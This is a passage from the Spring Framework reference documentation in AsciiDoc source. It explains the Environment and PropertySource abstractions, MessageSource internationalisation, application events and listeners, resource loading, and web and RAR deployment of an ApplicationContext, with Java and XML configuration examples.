containsFoo = env.containsProperty(\"foo\");\nSystem.out.println(\"Does my environment contain the 'foo' property? \" + containsFoo);\n----\n\nIn the snippet above, we see a high-level way of asking Spring whether the `foo` property is\ndefined for the current environment. To answer this question, the `Environment` object performs\na search over a set of {api-spring-framework}\/core\/env\/PropertySource.html[`PropertySource`]\nobjects. A `PropertySource` is a simple abstraction over any source of key-value pairs, and\nSpring's {api-spring-framework}\/core\/env\/StandardEnvironment.html[`StandardEnvironment`]\nis configured with two PropertySource objects -- one representing the set of JVM system properties\n(_a la_ `System.getProperties()`) and one representing the set of system environment variables\n(_a la_ `System.getenv()`).\n\n[NOTE]\n====\nThese default property sources are present for `StandardEnvironment`, for use in standalone\napplications. {api-spring-framework}\/web\/context\/support\/StandardServletEnvironment.html[`StandardServletEnvironment`]\nis populated with additional default property sources including servlet config and servlet\ncontext parameters. It can optionally enable a {api-spring-framework}\/jndi\/JndiPropertySource.html[`JndiPropertySource`].\nSee the javadocs for details.\n====\n\nConcretely, when using the `StandardEnvironment`, the call to `env.containsProperty(\"foo\")`\nwill return true if a `foo` system property or `foo` environment variable is present at\nruntime.\n\n[TIP]\n====\nThe search performed is hierarchical. By default, system properties have precedence over\nenvironment variables, so if the `foo` property happens to be set in both places during\na call to `env.getProperty(\"foo\")`, the system property value will 'win' and be returned\npreferentially over the environment variable. Note that property values will not get merged\nbut rather completely overridden by a preceding entry.\n\nFor a common `StandardServletEnvironment`, the full hierarchy looks as follows, with the\nhighest-precedence entries at the top:\n\n* ServletConfig parameters (if applicable, e.g. in case of a `DispatcherServlet` context)\n* ServletContext parameters (web.xml context-param entries)\n* JNDI environment variables (\"java:comp\/env\/\" entries)\n* JVM system properties (\"-D\" command-line arguments)\n* JVM system environment (operating system environment variables)\n====\n\nMost importantly, the entire mechanism is configurable. Perhaps you have a custom source\nof properties that you'd like to integrate into this search. No problem -- simply implement\nand instantiate your own `PropertySource` and add it to the set of `PropertySources` for the\ncurrent `Environment`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nConfigurableApplicationContext ctx = new GenericApplicationContext();\nMutablePropertySources sources = ctx.getEnvironment().getPropertySources();\nsources.addFirst(new MyPropertySource());\n----\n\nIn the code above, `MyPropertySource` has been added with highest precedence in the\nsearch. If it contains a `foo` property, it will be detected and returned ahead of\nany `foo` property in any other `PropertySource`. The\n{api-spring-framework}\/core\/env\/MutablePropertySources.html[`MutablePropertySources`]\nAPI exposes a number of methods that allow for precise manipulation of the set of\nproperty sources.\n\n=== @PropertySource\n\nThe {api-spring-framework}\/context\/annotation\/PropertySource.html[`@PropertySource`]\nannotation provides a convenient and declarative mechanism for adding a `PropertySource`\nto Spring's `Environment`.\n\nGiven a file \"app.properties\" containing the key\/value pair `testbean.name=myTestBean`,\nthe following `@Configuration` class uses `@PropertySource` in such a way that\na call to `testBean.getName()` will return \"myTestBean\".\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n @Configuration\n **@PropertySource(\"classpath:\/com\/myco\/app.properties\")**\n public class AppConfig {\n\t @Autowired\n\t Environment env;\n\n\t @Bean\n\t public TestBean testBean() {\n\t\t TestBean testBean = new TestBean();\n\t\t testBean.setName(env.getProperty(\"testbean.name\"));\n\t\t return testBean;\n\t }\n }\n----\n\nAny `${...}` placeholders present in a `@PropertySource` resource location will\nbe resolved against the set of property sources already registered against the\nenvironment. For example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n @Configuration\n @PropertySource(\"classpath:\/com\/${my.placeholder:default\/path}\/app.properties\")\n public class AppConfig {\n\t @Autowired\n\t Environment env;\n\n\t @Bean\n\t public TestBean testBean() {\n\t\t TestBean testBean = new TestBean();\n\t\t testBean.setName(env.getProperty(\"testbean.name\"));\n\t\t return testBean;\n\t }\n }\n----\n\nAssuming that \"my.placeholder\" is present in one of the property sources already\nregistered, e.g. system properties or environment variables, the placeholder will\nbe resolved to the corresponding value. If not, then \"default\/path\" will be used\nas a default. If no default is specified and a property cannot be resolved, an\n`IllegalArgumentException` will be thrown.\n\n\n=== Placeholder resolution in statements\n\nHistorically, the value of placeholders in elements could be resolved only against\nJVM system properties or environment variables. No longer is this the case. Because\nthe Environment abstraction is integrated throughout the container, it's easy to\nroute resolution of placeholders through it. This means that you may configure the\nresolution process in any way you like: change the precedence of searching through\nsystem properties and environment variables, or remove them entirely; add your\nown property sources to the mix as appropriate.\n\nConcretely, the following statement works regardless of where the `customer`\nproperty is defined, as long as it is available in the `Environment`:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<import resource=\"com\/bank\/service\/${customer}-config.xml\"\/>\n\t<\/beans>\n----\n\n\n[[context-load-time-weaver]]\n== Registering a LoadTimeWeaver\n\nThe `LoadTimeWeaver` is used by Spring to dynamically transform classes as they are\nloaded into the Java virtual machine (JVM).\n\nTo enable load-time weaving add the `@EnableLoadTimeWeaving` to one of your\n`@Configuration` classes:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@EnableLoadTimeWeaving\n\tpublic class AppConfig {\n\n\t}\n----\n\nAlternatively for XML configuration use the `context:load-time-weaver` element:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<context:load-time-weaver\/>\n\t<\/beans>\n----\n\nOnce configured for the `ApplicationContext`. Any bean within that `ApplicationContext`\nmay implement `LoadTimeWeaverAware`, thereby receiving a reference to the load-time\nweaver instance. This is particularly useful in combination with <<orm-jpa,Spring's JPA\nsupport>> where load-time weaving may be necessary for JPA class transformation. Consult\nthe `LocalContainerEntityManagerFactoryBean` javadocs for more detail. For more on\nAspectJ load-time weaving, see <<aop-aj-ltw>>.\n\n\n\n\n[[context-introduction]]\n== Additional Capabilities of the ApplicationContext\n\nAs was discussed in the chapter introduction, the `org.springframework.beans.factory`\npackage provides basic functionality for managing and manipulating beans, including in a\nprogrammatic way. The `org.springframework.context` package adds the\n{api-spring-framework}\/context\/ApplicationContext.html[`ApplicationContext`]\ninterface, which extends the `BeanFactory` interface, in addition to extending other\ninterfaces to provide additional functionality in a more __application\nframework-oriented style__. Many people use the `ApplicationContext` in a completely\ndeclarative fashion, not even creating it programmatically, but instead relying on\nsupport classes such as `ContextLoader` to automatically instantiate an\n`ApplicationContext` as part of the normal startup process of a Java EE web application.\n\nTo enhance `BeanFactory` functionality in a more framework-oriented style the context\npackage also provides the following functionality:\n\n* __Access to messages in i18n-style__, through the `MessageSource` interface.\n* __Access to resources__, such as URLs and files, through the `ResourceLoader` interface.\n* __Event publication__ to namely beans implementing the `ApplicationListener` interface,\n through the use of the `ApplicationEventPublisher` interface.\n* __Loading of multiple (hierarchical) contexts__, allowing each to be focused on one\n particular layer, such as the web layer of an application, through the\n `HierarchicalBeanFactory` interface.\n\n\n\n[[context-functionality-messagesource]]\n=== Internationalization using MessageSource\n\nThe `ApplicationContext` interface extends an interface called `MessageSource`, and\ntherefore provides internationalization (i18n) functionality. Spring also provides the\ninterface `HierarchicalMessageSource`, which can resolve messages hierarchically.\nTogether these interfaces provide the foundation upon which Spring effects message\nresolution. The methods defined on these interfaces include:\n\n* `String getMessage(String code, Object[] args, String default, Locale loc)`: The basic\n method used to retrieve a message from the `MessageSource`. When no message is found\n for the specified locale, the default message is used. Any arguments passed in become\n replacement values, using the `MessageFormat` functionality provided by the standard\n library.\n* `String getMessage(String code, Object[] args, Locale loc)`: Essentially the same as\n the previous method, but with one difference: no default message can be specified; if\n the message cannot be found, a `NoSuchMessageException` is thrown.\n* `String getMessage(MessageSourceResolvable resolvable, Locale locale)`: All properties\n used in the preceding methods are also wrapped in a class named\n `MessageSourceResolvable`, which you can use with this method.\n\nWhen an `ApplicationContext` is loaded, it automatically searches for a `MessageSource`\nbean defined in the context. The bean must have the name `messageSource`. If such a bean\nis found, all calls to the preceding methods are delegated to the message source. If no\nmessage source is found, the `ApplicationContext` attempts to find a parent containing a\nbean with the same name. If it does, it uses that bean as the `MessageSource`. If the\n`ApplicationContext` cannot find any source for messages, an empty\n`DelegatingMessageSource` is instantiated in order to be able to accept calls to the\nmethods defined above.\n\nSpring provides two `MessageSource` implementations, `ResourceBundleMessageSource` and\n`StaticMessageSource`. Both implement `HierarchicalMessageSource` in order to do nested\nmessaging. The `StaticMessageSource` is rarely used but provides programmatic ways to\nadd messages to the source. The `ResourceBundleMessageSource` is shown in the following\nexample:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<bean id=\"messageSource\"\n\t\t\t\tclass=\"org.springframework.context.support.ResourceBundleMessageSource\">\n\t\t\t<property name=\"basenames\">\n\t\t\t\t<list>\n\t\t\t\t\t<value>format<\/value>\n\t\t\t\t\t<value>exceptions<\/value>\n\t\t\t\t\t<value>windows<\/value>\n\t\t\t\t<\/list>\n\t\t\t<\/property>\n\t\t<\/bean>\n\t<\/beans>\n----\n\nIn the example it is assumed you have three resource bundles defined in your classpath\ncalled `format`, `exceptions` and `windows`. Any request to resolve a message will be\nhandled in the JDK standard way of resolving messages through ResourceBundles. For the\npurposes of the example, assume the contents of two of the above resource bundle files\nare...\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t# in format.properties\n\tmessage=Alligators rock!\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t# in exceptions.properties\n\targument.required=The {0} argument is required.\n----\n\nA program to execute the `MessageSource` functionality is shown in the next example.\nRemember that all `ApplicationContext` implementations are also `MessageSource`\nimplementations and so can be cast to the `MessageSource` interface.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tMessageSource resources = new ClassPathXmlApplicationContext(\"beans.xml\");\n\t\tString message = resources.getMessage(\"message\", null, \"Default\", null);\n\t\tSystem.out.println(message);\n\t}\n----\n\nThe resulting output from the above program will be...\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\nAlligators rock!\n----\n\nSo to summarize, the `MessageSource` is defined in a file called `beans.xml`, which\nexists at the root of your classpath. The `messageSource` bean definition refers to a\nnumber of resource bundles through its `basenames` property. The three files that are\npassed in the list to the `basenames` property exist as files at the root of your\nclasspath and are called `format.properties`, `exceptions.properties`, and\n`windows.properties` respectively.\n\nThe next example shows arguments passed to the message lookup; these arguments will be\nconverted into Strings and inserted into placeholders in the lookup message.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\n\t\t<!-- this MessageSource is being used in a web application -->\n\t\t<bean id=\"messageSource\" class=\"org.springframework.context.support.ResourceBundleMessageSource\">\n\t\t\t<property name=\"basename\" value=\"exceptions\"\/>\n\t\t<\/bean>\n\n\t\t<!-- lets inject the above MessageSource into this POJO -->\n\t\t<bean id=\"example\" class=\"com.foo.Example\">\n\t\t\t<property name=\"messages\" ref=\"messageSource\"\/>\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class Example {\n\n\t\tprivate MessageSource messages;\n\n\t\tpublic void setMessages(MessageSource messages) {\n\t\t\tthis.messages = messages;\n\t\t}\n\n\t\tpublic void execute() {\n\t\t\tString message = this.messages.getMessage(\"argument.required\",\n\t\t\t\tnew Object [] {\"userDao\"}, \"Required\", null);\n\t\t\tSystem.out.println(message);\n\t\t}\n\n\t}\n----\n\nThe resulting output from the invocation of the `execute()` method will be...\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\nThe userDao argument is required.\n----\n\nWith regard to internationalization (i18n), Spring's various `MessageSource`\nimplementations follow the same locale resolution and fallback rules as the standard JDK\n`ResourceBundle`. In short, and continuing with the example `messageSource` defined\npreviously, if you want to resolve messages against the British (`en-GB`) locale, you\nwould create files called `format_en_GB.properties`, `exceptions_en_GB.properties`, and\n`windows_en_GB.properties` respectively.\n\nTypically, locale resolution is managed by the surrounding environment of the\napplication. In this example, the locale against which (British) messages will be\nresolved is specified manually.\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\n# in exceptions_en_GB.properties\nargument.required=Ebagum lad, the {0} argument is required, I say, required.\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(final String[] args) {\n\t\tMessageSource resources = new ClassPathXmlApplicationContext(\"beans.xml\");\n\t\tString message = resources.getMessage(\"argument.required\",\n\t\t\tnew Object [] {\"userDao\"}, \"Required\", Locale.UK);\n\t\tSystem.out.println(message);\n\t}\n----\n\nThe resulting output from the running of the above program will be...\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\nEbagum lad, the 'userDao' argument is required, I say, required.\n----\n\nYou can also use the `MessageSourceAware` interface to acquire a reference to any\n`MessageSource` that has been defined. Any bean that is defined in an\n`ApplicationContext` that implements the `MessageSourceAware` interface is injected with\nthe application context's `MessageSource` when the bean is created and configured.\n\n[NOTE]\n====\n__As an alternative to `ResourceBundleMessageSource`, Spring provides a\n`ReloadableResourceBundleMessageSource` class. This variant supports the same bundle\nfile format but is more flexible than the standard JDK based\n`ResourceBundleMessageSource` implementation.__ In particular, it allows for reading\nfiles from any Spring resource location (not just from the classpath) and supports hot\nreloading of bundle property files (while efficiently caching them in between). Check\nout the `ReloadableResourceBundleMessageSource` javadocs for details.\n====\n\n\n\n[[context-functionality-events]]\n=== Standard and Custom Events\n\nEvent handling in the `ApplicationContext` is provided through the `ApplicationEvent`\nclass and `ApplicationListener` interface. If a bean that implements the\n`ApplicationListener` interface is deployed into the context, every time an\n`ApplicationEvent` gets published to the `ApplicationContext`, that bean is notified.\nEssentially, this is the standard __Observer__ design pattern.\n\n[TIP]\n====\nAs of Spring 4.2, the event infrastructure has been significantly improved and offer\nan <<context-functionality-events-annotation,annotation-based model>> as well as the\nability to publish any arbitrary event, that is an object that does not necessarily\nextend from `ApplicationEvent`. When such an object is published we wrap it in an\nevent for you.\n====\n\nSpring provides the following standard events:\n\n[[beans-ctx-events-tbl]]\n.Built-in Events\n|===\n| Event| Explanation\n\n| `ContextRefreshedEvent`\n| Published when the `ApplicationContext` is initialized or refreshed, for example,\n using the `refresh()` method on the `ConfigurableApplicationContext` interface.\n \"Initialized\" here means that all beans are loaded, post-processor beans are detected\n and activated, singletons are pre-instantiated, and the `ApplicationContext` object is\n ready for use. As long as the context has not been closed, a refresh can be triggered\n multiple times, provided that the chosen `ApplicationContext` actually supports such\n \"hot\" refreshes. For example, `XmlWebApplicationContext` supports hot refreshes, but\n `GenericApplicationContext` does not.\n\n| `ContextStartedEvent`\n| Published when the `ApplicationContext` is started, using the `start()` method on the\n `ConfigurableApplicationContext` interface. \"Started\" here means that all `Lifecycle`\n beans receive an explicit start signal. Typically this signal is used to restart beans\n after an explicit stop, but it may also be used to start components that have not been\n configured for autostart , for example, components that have not already started on\n initialization.\n\n| `ContextStoppedEvent`\n| Published when the `ApplicationContext` is stopped, using the `stop()` method on the\n `ConfigurableApplicationContext` interface. \"Stopped\" here means that all `Lifecycle`\n beans receive an explicit stop signal. A stopped context may be restarted through a\n `start()` call.\n\n| `ContextClosedEvent`\n| Published when the `ApplicationContext` is closed, using the `close()` method on the\n `ConfigurableApplicationContext` interface. \"Closed\" here means that all singleton\n beans are destroyed. A closed context reaches its end of life; it cannot be refreshed\n or restarted.\n\n| `RequestHandledEvent`\n| A web-specific event telling all beans that an HTTP request has been serviced. This\n event is published __after__ the request is complete. This event is only applicable to\n web applications using Spring's `DispatcherServlet`.\n|===\n\nYou can also create and publish your own custom events. This example demonstrates a\nsimple class that extends Spring's `ApplicationEvent` base class:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class BlackListEvent extends ApplicationEvent {\n\n\t\tprivate final String address;\n\t\tprivate final String test;\n\n\t\tpublic BlackListEvent(Object source, String address, String test) {\n\t\t\tsuper(source);\n\t\t\tthis.address = address;\n\t\t\tthis.test = test;\n\t\t}\n\n\t\t\/\/ accessor and other methods...\n\n\t}\n----\n\nTo publish a custom `ApplicationEvent`, call the `publishEvent()` method on an\n`ApplicationEventPublisher`. Typically this is done by creating a class that implements\n`ApplicationEventPublisherAware` and registering it as a Spring bean. The following\nexample demonstrates such a class:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class EmailService implements ApplicationEventPublisherAware {\n\n\t\tprivate List<String> blackList;\n\t\tprivate ApplicationEventPublisher publisher;\n\n\t\tpublic void setBlackList(List<String> blackList) {\n\t\t\tthis.blackList = blackList;\n\t\t}\n\n\t\tpublic void setApplicationEventPublisher(ApplicationEventPublisher publisher) {\n\t\t\tthis.publisher = publisher;\n\t\t}\n\n\t\tpublic void sendEmail(String address, String text) {\n\t\t\tif (blackList.contains(address)) {\n\t\t\t\tBlackListEvent event = new BlackListEvent(this, address, text);\n\t\t\t\tpublisher.publishEvent(event);\n\t\t\t\treturn;\n\t\t\t}\n\t\t\t\/\/ send email...\n\t\t}\n\n\t}\n----\n\nAt configuration time, the Spring container will detect that `EmailService` implements\n`ApplicationEventPublisherAware` and will automatically call\n`setApplicationEventPublisher()`. In reality, the parameter passed in will be the Spring\ncontainer itself; you're simply interacting with the application context via its\n`ApplicationEventPublisher` interface.\n\nTo receive the custom `ApplicationEvent`, create a class that implements\n`ApplicationListener` and register it as a Spring bean. The following example\ndemonstrates such a class:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class BlackListNotifier implements ApplicationListener<BlackListEvent> {\n\n\t\tprivate String notificationAddress;\n\n\t\tpublic void setNotificationAddress(String notificationAddress) {\n\t\t\tthis.notificationAddress = notificationAddress;\n\t\t}\n\n\t\tpublic void onApplicationEvent(BlackListEvent event) {\n\t\t\t\/\/ notify appropriate parties via notificationAddress...\n\t\t}\n\n\t}\n----\n\nNotice that `ApplicationListener` is generically parameterized with the type of your\ncustom event, `BlackListEvent`. This means that the `onApplicationEvent()` method can\nremain type-safe, avoiding any need for downcasting. You may register as many event\nlisteners as you wish, but note that by default event listeners receive events\nsynchronously. This means the `publishEvent()` method blocks until all listeners have\nfinished processing the event. One advantage of this synchronous and single-threaded\napproach is that when a listener receives an event, it operates inside the transaction\ncontext of the publisher if a transaction context is available. If another strategy for\nevent publication becomes necessary, refer to the JavaDoc for Spring's\n`ApplicationEventMulticaster` interface.\n\nThe following example shows the bean definitions used to register and configure each of\nthe classes above:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"emailService\" class=\"example.EmailService\">\n\t\t<property name=\"blackList\">\n\t\t\t<list>\n\t\t\t\t<value>known.spammer@example.org<\/value>\n\t\t\t\t<value>known.hacker@example.org<\/value>\n\t\t\t\t<value>john.doe@example.org<\/value>\n\t\t\t<\/list>\n\t\t<\/property>\n\t<\/bean>\n\n\t<bean id=\"blackListNotifier\" class=\"example.BlackListNotifier\">\n\t\t<property name=\"notificationAddress\" value=\"blacklist@example.org\"\/>\n\t<\/bean>\n----\n\nPutting it all together, when the `sendEmail()` method of the `emailService` bean is\ncalled, if there are any emails that should be blacklisted, a custom event of type\n`BlackListEvent` is published. The `blackListNotifier` bean is registered as an\n`ApplicationListener` and thus receives the `BlackListEvent`, at which point it can\nnotify appropriate parties.\n\n[NOTE]\n====\nSpring's eventing mechanism is designed for simple communication between Spring beans\nwithin the same application context. However, for more sophisticated enterprise\nintegration needs, the separately-maintained\nhttp:\/\/projects.spring.io\/spring-integration\/[Spring Integration] project provides\ncomplete support for building lightweight,\nhttp:\/\/www.enterpriseintegrationpatterns.com[pattern-oriented], event-driven\narchitectures that build upon the well-known Spring programming model.\n====\n\n[[context-functionality-events-annotation]]\n==== Annotation-based Event Listeners\n\nAs of Spring 4.2, an event listener can be registered on any public method of a managed\nbean via the `EventListener` annotation. The `BlackListNotifier` can be rewritten as\nfollows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class BlackListNotifier {\n\n\t\tprivate String notificationAddress;\n\n\t\tpublic void setNotificationAddress(String notificationAddress) {\n\t\t\tthis.notificationAddress = notificationAddress;\n\t\t}\n\n\t\t@EventListener\n\t\tpublic void processBlackListEvent(BlackListEvent event) {\n\t\t\t\/\/ notify appropriate parties via notificationAddress...\n\t\t}\n\n\t}\n----\n\nAs you can see above, the method signature actually _infer_ which even type it listens to. This\nalso works for nested generics as long as the actual event resolves the generics parameter you\nwould filter on.\n\nIf your method should listen to several events or if you want to define it with no\nparameter at all, the event type(s) can also be specified on the annotation itself:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@EventListener({ContextStartedEvent.class, ContextRefreshedEvent.class})\n\tpublic void handleContextStart() {\n\n\t}\n----\n\n\nIt is also possible to add additional runtime filtering via the `condition` attribute of the\nannotation that defines a <<expressions,`SpEL` expression>> that should match to actually invoke\nthe method for a particular event.\n\nFor instance, our notifier can be rewritten to be only invoked if the `test` attribute of the\nevent is equal to `foo`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@EventListener(condition = \"#event.test == 'foo'\")\n\tpublic void processBlackListEvent(BlackListEvent event) {\n\t\t\/\/ notify appropriate parties via notificationAddress...\n\t}\n----\n\nEach `SpEL` expression evaluates again a dedicated context. The next table lists the items made\navailable to the context so one can use them for conditional event processing:\n\n[[context-functionality-events-annotation-tbl]]\n.Event SpEL available metadata\n|===\n| Name| Location| Description| Example\n\n| event\n| root object\n| The actual `ApplicationEvent`\n| `#root.event`\n\n| args\n| root object\n| The arguments (as array) used for invoking the target\n| `#root.args[0]`\n\n| __argument name__\n| evaluation context\n| Name of any of the method arguments. If for some reason the names are not available\n (e.g. no debug information), the argument names are also available under the `#a<#arg>`\n where __#arg__ stands for the argument index (starting from 0).\n| `#iban` or `#a0` (one can also use `#p0` or `#p<#arg>` notation as an alias).\n|===\n\nNote that `#root.event` allows you to access to the underlying event, even if your method\nsignature actually refers to an arbitrary object that was published.\n\nIf you need to publish an event as the result of processing another, just change the\nmethod signature to return the event that should be published, something like:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@EventListener\n\tpublic ListUpdateEvent handleBlackListEvent(BlackListEvent event) {\n\t\t\/\/ notify appropriate parties via notificationAddress and\n\t\t\/\/ then publish a ListUpdateEvent...\n\t}\n----\n\nNOTE: This feature is not supported for <<context-functionality-events-async,asynchronous\nlisteners>>.\n\nThis new method will publish a new `ListUpdateEvent` for every `BlackListEvent` handled\nby the method above. If you need to publish several events, just return a `Collection` of\nevents instead.\n\n[[context-functionality-events-async]]\n==== Asynchronous Listeners\n\nIf you want a particular listener to process events asynchronously, simply reuse the\n<<scheduling-annotation-support-async,regular `@Async` support>>:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@EventListener\n\t@Async\n\tpublic void processBlackListEvent(BlackListEvent event) {\n\t\t\/\/ BlackListEvent is processed in a separate thread\n\t}\n----\n\nBe aware of the following limitations when using asynchronous events:\n\n. If the event listener throws an `Exception` it will not be propagated to the caller,\n check `AsyncUncaughtExceptionHandler` for more details.\n. Such event listener cannot send replies. If you need to send another event as the\n result of the processing, inject `ApplicationEventPublisher` to send the event\n manually.\n\n\n[[context-functionality-events-order]]\n==== Ordering Listeners\n\nIf you need the listener to be invoked before another one, just add the `@Order`\nannotation to the method declaration:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@EventListener\n\t@Order(42)\n\tpublic void processBlackListEvent(BlackListEvent event) {\n\t\t\/\/ notify appropriate parties via notificationAddress...\n\t}\n----\n\n[[context-functionality-events-generics]]\n==== Generic Events\n\nYou may also use generics to further define the structure of your event. Consider an\n`EntityCreatedEvent<T>` where `T` is the type of the actual entity that got created. You\ncan create the following listener definition to only receive `EntityCreatedEvent` for a\n`Person`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@EventListener\n\tpublic void onPersonCreated(EntityCreatedEvent<Person> event) {\n\t\t...\n\t}\n----\n\n\nDue to type erasure, this will only work if the event that is fired resolves the generic\nparameter(s) on which the event listener filters on (that is something like\n`class PersonCreatedEvent extends EntityCreatedEvent<Person> { ... }`).\n\nIn certain circumstances, this may become quite tedious if all events follow the same\nstructure (as it should be the case for the event above). In such a case, you can\nimplement `ResolvableTypeProvider` to _guide_ the framework beyond what the runtime\nenvironment provides:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class EntityCreatedEvent<T>\n \t\textends ApplicationEvent implements ResolvableTypeProvider {\n\n \tpublic EntityCreatedEvent(T entity) {\n \t\tsuper(entity);\n \t}\n\n \t@Override\n \tpublic ResolvableType getResolvableType() {\n \t\treturn ResolvableType.forClassWithGenerics(getClass(),\n \t\t\t\tResolvableType.forInstance(getSource()));\n \t}\n }\n----\n\n[TIP]\n====\nThis works not only for `ApplicationEvent` but any arbitrary object that you'd send as\nan event.\n====\n\n\n\n[[context-functionality-resources]]\n=== Convenient access to low-level resources\n\nFor optimal usage and understanding of application contexts, users should generally\nfamiliarize themselves with Spring's `Resource` abstraction, as described in the chapter\n<<resources>>.\n\nAn application context is a `ResourceLoader`, which can be used to load ``Resource``s. A\n`Resource` is essentially a more feature rich version of the JDK class `java.net.URL`,\nin fact, the implementations of the `Resource` wrap an instance of `java.net.URL` where\nappropriate. A `Resource` can obtain low-level resources from almost any location in a\ntransparent fashion, including from the classpath, a filesystem location, anywhere\ndescribable with a standard URL, and some other variations. If the resource location\nstring is a simple path without any special prefixes, where those resources come from is\nspecific and appropriate to the actual application context type.\n\nYou can configure a bean deployed into the application context to implement the special\ncallback interface, `ResourceLoaderAware`, to be automatically called back at\ninitialization time with the application context itself passed in as the\n`ResourceLoader`. You can also expose properties of type `Resource`, to be used to\naccess static resources; they will be injected into it like any other properties. You\ncan specify those `Resource` properties as simple String paths, and rely on a special\nJavaBean `PropertyEditor` that is automatically registered by the context, to convert\nthose text strings to actual `Resource` objects when the bean is deployed.\n\nThe location path or paths supplied to an `ApplicationContext` constructor are actually\nresource strings, and in simple form are treated appropriately to the specific context\nimplementation. `ClassPathXmlApplicationContext` treats a simple location path as a\nclasspath location. You can also use location paths (resource strings) with special\nprefixes to force loading of definitions from the classpath or a URL, regardless of the\nactual context type.\n\n\n\n[[context-create]]\n=== Convenient ApplicationContext instantiation for web applications\n\nYou can create `ApplicationContext` instances declaratively by using, for example, a\n`ContextLoader`. Of course you can also create `ApplicationContext` instances\nprogrammatically by using one of the `ApplicationContext` implementations.\n\nYou can register an `ApplicationContext` using the `ContextLoaderListener` as follows:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<context-param>\n\t\t<param-name>contextConfigLocation<\/param-name>\n\t\t<param-value>\/WEB-INF\/daoContext.xml \/WEB-INF\/applicationContext.xml<\/param-value>\n\t<\/context-param>\n\n\t<listener>\n\t\t<listener-class>org.springframework.web.context.ContextLoaderListener<\/listener-class>\n\t<\/listener>\n----\n\nThe listener inspects the `contextConfigLocation` parameter. If the parameter does not\nexist, the listener uses `\/WEB-INF\/applicationContext.xml` as a default. When the\nparameter __does__ exist, the listener separates the String by using predefined\ndelimiters (comma, semicolon and whitespace) and uses the values as locations where\napplication contexts will be searched. Ant-style path patterns are supported as well.\nExamples are `\/WEB-INF\/{asterisk}Context.xml` for all files with names ending with \"Context.xml\",\nresiding in the \"WEB-INF\" directory, and `\/WEB-INF\/**\/*Context.xml`, for all such files\nin any subdirectory of \"WEB-INF\".\n\n\n\n[[context-deploy-rar]]\n=== Deploying a Spring ApplicationContext as a Java EE RAR file\n\nIt is possible to deploy a Spring ApplicationContext as a RAR file, encapsulating the\ncontext and all of its required bean classes and library JARs in a Java EE RAR deployment\nunit. This is the equivalent of bootstrapping a standalone ApplicationContext, just hosted\nin Java EE environment, being able to access the Java EE servers facilities. RAR deployment\nis more natural alternative to scenario of deploying a headless WAR file, in effect, a WAR\nfile without any HTTP entry points that is used only for bootstrapping a Spring\nApplicationContext in a Java EE environment.\n\nRAR deployment is ideal for application contexts that do not need HTTP entry points but\nrather consist only of message endpoints and scheduled jobs. Beans in such a context can\nuse application server resources such as the JTA transaction manager and JNDI-bound JDBC\nDataSources and JMS ConnectionFactory instances, and may also register with the\nplatform's JMX server - all through Spring's standard transaction management and JNDI\nand JMX support facilities. Application components can also interact with the\napplication server's JCA WorkManager through Spring's `TaskExecutor` abstraction.\n\nCheck out the JavaDoc of the\n{api-spring-framework}\/jca\/context\/SpringContextResourceAdapter.html[`SpringContextResourceAdapter`]\nclass for the configuration details involved in RAR deployment.\n\n__For a simple deployment of a Spring ApplicationContext as a Java EE RAR file:__ package\nall application classes into a RAR file, which is a standard JAR file with a different\nfile extension. Add all required library JARs into the root of the RAR archive. Add a\n\"META-INF\/ra.xml\" deployment descriptor (as shown in ``SpringContextResourceAdapter``s\nJavaDoc) and the corresponding Spring XML bean definition file(s) (typically\n\"META-INF\/applicationContext.xml\"), and drop the resulting RAR file into your\napplication server's deployment directory.\n\n[NOTE]\n====\nSuch RAR deployment units are usually self-contained; they do not expose components to\nthe outside world, not even to other modules of the same application. Interaction with a\nRAR-based ApplicationContext usually occurs through JMS destinations that it shares with\nother modules. A RAR-based ApplicationContext may also, for example, schedule some jobs,\nreacting to new files in the file system (or the like). If it needs to allow synchronous\naccess from the outside, it could for example export RMI endpoints, which of course may\nbe used by other application modules on the same machine.\n====\n\n\n\n\n[[beans-beanfactory]]\n== The BeanFactory\nThe `BeanFactory` provides the underlying basis for Spring's IoC functionality but it is\nonly used directly in integration with other third-party frameworks and is now largely\nhistorical in nature for most users of Spring. The `BeanFactory` and related interfaces,\nsuch as `BeanFactoryAware`, `InitializingBean`, 